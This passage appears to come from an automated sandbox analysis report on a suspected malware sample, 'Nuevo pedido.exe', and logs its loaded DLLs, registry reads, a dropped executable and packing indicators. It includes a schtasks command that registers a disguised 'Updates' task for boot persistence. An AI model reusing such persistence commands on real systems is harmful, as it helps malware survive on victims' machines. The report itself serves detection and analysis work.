                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeSection loaded: edputil.dll
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeAutomated click: OK
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Nuevo pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Nuevo pedido.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Nuevo pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: btC:\Windows\dll\mscorlib.pdb'w source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: uindows\hEab.pdbpdbEab.pdb source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: hEab.pdb source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
                  Source: Binary string: hEab.pdbSHA256 source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_02676670 pushad ; retf 0_2_026766AD
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_026766F7 pushfd ; retf 0_2_02676701
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_02676B30 pushfd ; iretd 0_2_02676B31
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_02675D95 push FFFFFF8Bh; iretd 0_2_02675D97
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_05718693 push eax; ret 10_2_057186C3
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_05717BB8 push eax; mov dword ptr [esp], ecx10_2_05717BBC
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_03059C30 push esp; retf 0312h14_2_03059D55
                  Source: Nuevo pedido.exeStatic PE information: section name: .text entropy: 7.94951474543567
                  Source: QGVhHsAOjb.exe.0.drStatic PE information: section name: .text entropy: 7.94951474543567
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
